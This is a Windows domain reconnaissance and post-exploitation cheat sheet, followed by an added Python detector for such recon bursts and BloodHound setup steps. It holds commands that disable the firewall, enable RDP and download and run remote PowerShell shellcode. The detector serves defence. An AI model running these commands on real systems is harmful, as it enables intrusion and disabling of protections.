
【Internal Network】

1、Local host collection

1.1 System and software information
wmic product get name,version    list installed software and version information
1.2 Service information
wmic service list brief    query the local services
1.3 Process information
tasklist    list the current processes and their users
wmic process list brief    show process information
1.4 Antivirus identification (process names)
360sd.exe  360tray.exe  ZhuDongFangYu.exe  SafeDogUpdateCenter.exe  McAfee McShield.exe  AVP.EXE (Kaspersky)  avguard.exe (Avira)  bdagent.exe (BitDefender)
1.5 Startup program information
wmic startup get command,caption
1.6 Scheduled tasks
schtasks /query /fo LIST /v
1.7 User list
net user    list local users
net localgroup administrators    get the local administrators (usually includes domain users)
query user || qwinsta    query the users currently logged on
1.8 Port information
netstat -ano    show TCP/UDP port usage
1.9 Patch information
systeminfo    show system information
wmic qfe get Caption,Description,HotFixID,InstalledOn    show installed patches
1.10 Local share list
net share
Query the routing table:
route print
arp -a
1.11 Firewall information
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off    (systems after Windows 2003)  turns the firewall off
1.12 Proxy configuration
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
1.13 Enable the remote connection (RDP) port
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__class !="") call setallowtsconnections 1

The following .bat script collects most of the above into one HTML report:

for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> xxx.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> xxx.html
wmic USERACCOUNT list full /format:"%var%" >> xxx.html
wmic group list full /format:"%var%" >> xxx.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> xxx.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> xxx.html
wmic netuse list full /format:"%var%" >> xxx.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> xxx.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> xxx.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> xxx.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> xxx.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> xxx.html

Save it as a .bat file; after it finishes, open xxx.html.

2、Checking privileges

2.1 whoami --- current user and privileges
2.2 whoami /all --- domain SID
2.3 net user administrator /domain --- details of the administrator account

3、Is there a domain environment

3.1 ipconfig /all    check for domain subnet segmentation, the DNS server IP, etc.
3.2 systeminfo    shows the current domain and the domain controller's computer name; ping the DC hostname to get the DC's IP; also shows patch status
3.3 net group "domain admins" /domain    this query shows that the current domain administrator is "Administrator"
3.4 net user /domain    lists the user names that exist in the domain
3.5 net group "domain computers" /domain    lists the hostnames currently joined to the domain
3.6 net time /domain    shows the domain time and the domain server name

4、Host discovery

4.1 ICMP
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="
4.2 Use nbtscan or arp-scan

5、Port probing

5.1 telnet
5.2 msf scanning
auxiliary/scanner/portscan/ack        ACK firewall scan
auxiliary/scanner/portscan/ftpbounce  FTP bounce port scan
auxiliary/scanner/portscan/syn        SYN port scan
auxiliary/scanner/portscan/tcp        TCP port scan
auxiliary/scanner/portscan/xmas       TCP "XMas" port scan
Use the auxiliary/scanner/portscan/tcp module.
5.3 nishang (ps1 port scanner)
-StartAddress    start address of the scan range
-EndAddress      end address of the scan range
-ScanPort        perform a port scan
-Port            specify the port(s)
-TimeOut         set the timeout
-ResolveHost     resolve hostnames
Scans for live hosts and open ports and resolves their hostnames.
5.4 nmap

6、Domain information

6.1 net group "domain computers" /domain    discover hosts in the domain
6.2 ping the hostnames found to obtain the IP addresses of the domain machines
6.3 Bulk liveness and port probing:
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="

7、Finding the domain controller

7.1 nltest /DCLIST:<domain name>    list the domain controllers of the domain
7.2 net group "Domain Controllers" /domain    find the domain controllers
7.3 netdom query pdc    find the primary domain controller

8、Getting domain user and domain admin information

8.1 List all users in the domain
net user /domain
wmic useraccount get /all
dsquery user
net localgroup administrators /domain
8.2 Query the domain admin groups
net group "domain admins" /domain
net group "Enterprise Admins" /domain

9、Finding domain admin processes

Check the local host
Look up domain user sessions on the domain controllers
Scan the tasks running on remote systems
Check patch information: wmic qfe    *MS14-068 can be used for privilege escalation (KB3011780)
Check the operating system type: wmic os

10、Collecting information with ps1 scripts

10.1 Remote download
IEX (New-Object Net.WebClient).DownloadString("http://<IP address>/CodeExecution/Invoke-Shellcode.ps1")
10.2 Change the execution policy
Set-ExecutionPolicy RemoteSigned
10.3 Port scanning
10.3.1 Single IP scan
1..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("127.0.0.1",$_)) "Port $_ is open!"} 2>$null
10.3.2 Single port across an IP range (uses Test-NetConnection, available from PowerShell 4.0)
foreach ($ip in 1..254) {Test-NetConnection -Port 445 -InformationLevel "Detailed" 192.168.1.$ip}
10.3.3 Multiple ports across an IP range
1..254 | % { $a = $_; 1..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.1.$a",$_)) "Port $_ is open!"} 2>$null}
Scanner v2 for an IP range and a set of specified ports:
1..254 | % { $a = $_; write-host "------"; write-host "192.168.1.$a"; 22,53,80,445 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.1.$a",$_)) "Port $_ is open!"} 2>$null}
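From the defender's side, the commands in sections 1 through 10 are exactly what should stand out in process-creation telemetry (Security event 4688 with command-line auditing, or PowerShell logging). The following Python script is an added example and not part of the original post: it classifies command lines into the discovery categories above and raises an alert when one account on one host runs several distinct categories within a short window, since a lone whoami or netstat is noise but a burst of patch, domain, sweep and port-scan commands is not. The event records, hostnames, user names and the corp.local domain are constructed sample data, and the field names are assumptions rather than a real log schema.

```python
"""Flag bursts of host/domain discovery commands in Windows process-creation telemetry.

Added example (not from the original post). Command lines are matched against the
enumeration commands listed in sections 1-10; an alert fires when one (host, user)
pair touches several distinct categories inside a time window. All events below
are constructed sample data; the dict keys are an assumed, not real, log schema.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (category, regex over the lower-cased command line). One rule per technique family
# so that an alert measures breadth of discovery, not repetition of one command.
RULES = [
    ("patch_software_enum", re.compile(r"\bwmic\b.*\b(product|qfe|os)\b|\bsysteminfo\b")),
    ("process_service_enum", re.compile(r"\bwmic\b.*\b(service|process|startup)\b|\btasklist\b|\bschtasks\b.*\s/query")),
    # 'net user' / 'net localgroup' without a trailing /domain are local account queries
    ("local_account_enum", re.compile(r"\bnet\s+(user|localgroup)\b(?!.*\s/domain)|\bwmic\b.*\buseraccount\b|\bquery\s+user\b|\bqwinsta\b|\bwhoami\b")),
    ("domain_enum", re.compile(r"\bnet\s+(group|localgroup|user|time)\b.*\s/domain|\bnltest\b.*\bdclist\b|\bnetdom\s+query\b|\bdsquery\s+user\b")),
    ("network_enum", re.compile(r"\bipconfig\b|\bnetstat\b|\broute\s+print\b|\barp\s+-a\b|\bnet\s+share\b")),
    ("firewall_rdp_tamper", re.compile(r"\bnetsh\b.*\b(advfirewall|firewall)\b.*\b(off|disable)\b|\bsetallowtsconnections\b")),
    ("ping_sweep", re.compile(r"\bfor\s+/l\b.*\bping\b|\bping\b.*\bfindstr\b.*ttl")),
    ("ps_port_scan", re.compile(r"net\.sockets\.tcpclient|test-netconnection")),
]


def classify(cmdline):
    """Return the set of discovery categories a command line falls into (empty if benign)."""
    text = cmdline.lower()
    return {cat for cat, rx in RULES if rx.search(text)}


def detect_recon_bursts(events, window=timedelta(minutes=10), min_categories=4):
    """Group classified events per (host, user); alert on the earliest window that
    reaches min_categories distinct categories. One alert per actor."""
    by_actor = defaultdict(list)
    for ev in events:
        cats = classify(ev["cmdline"])
        if cats:
            by_actor[(ev["host"], ev["user"])].append((ev["time"], cats))
    alerts = []
    for (host, user), hits in by_actor.items():
        hits.sort(key=lambda h: h[0])
        for i, (start, _) in enumerate(hits):
            seen, last = set(), start
            for t, cats in hits[i:]:
                if t - start > window:
                    break
                seen |= cats
                last = t
            if len(seen) >= min_categories:
                alerts.append({"host": host, "user": user, "categories": sorted(seen),
                               "first": start, "last": last})
                break
    return alerts


def _ev(minute, host, user, cmdline):
    # Constructed 4688-style record; a fixed date keeps the sample deterministic.
    return {"time": datetime(2024, 3, 1, 9, 0) + timedelta(minutes=minute),
            "host": host, "user": user, "cmdline": cmdline}


# Constructed sample: alice runs the section 1-10 playbook within six minutes,
# svc_backup runs two unrelated admin commands hours apart, bob does nothing notable.
SAMPLE_EVENTS = [
    _ev(0, "WS01", r"CORP\alice", "whoami /all"),
    _ev(1, "WS01", r"CORP\alice", "wmic qfe get Caption,Description,HotFixID,InstalledOn"),
    _ev(2, "WS01", r"CORP\alice", 'net group "domain admins" /domain'),
    _ev(3, "WS01", r"CORP\alice", "nltest /DCLIST:corp.local"),
    _ev(4, "WS01", r"CORP\alice", 'for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="'),
    _ev(5, "WS01", r"CORP\alice", 'powershell.exe -c "1..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(\'127.0.0.1\',$_)) \'Port $_ is open!\'} 2>$null"'),
    _ev(0, "SRV02", r"CORP\svc_backup", "schtasks /query /fo LIST /v"),
    _ev(150, "SRV02", r"CORP\svc_backup", "netstat -ano"),
    _ev(60, "WS03", r"CORP\bob", "notepad.exe report.txt"),
]

if __name__ == "__main__":
    for a in detect_recon_bursts(SAMPLE_EVENTS):
        print(f"{a['host']} {a['user']} {a['first']:%H:%M}-{a['last']:%H:%M}: {', '.join(a['categories'])}")
```

Running the script reports a single alert for CORP\alice on WS01 with five categories; the backup account stays silent because its two hits are in different windows. Tune window and min_categories to the environment, and treat firewall_rdp_tamper on its own as worth a look regardless of the threshold.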

Supplement: installing BloodHound

kali: run the following commands
apt-get update
apt-get dist-upgrade
apt-get install bloodhound
In a terminal, start the database with neo4j console, then browse to http://localhost:7474 (default credentials neo4j:neo4j). Open a new terminal and run bloodhound.
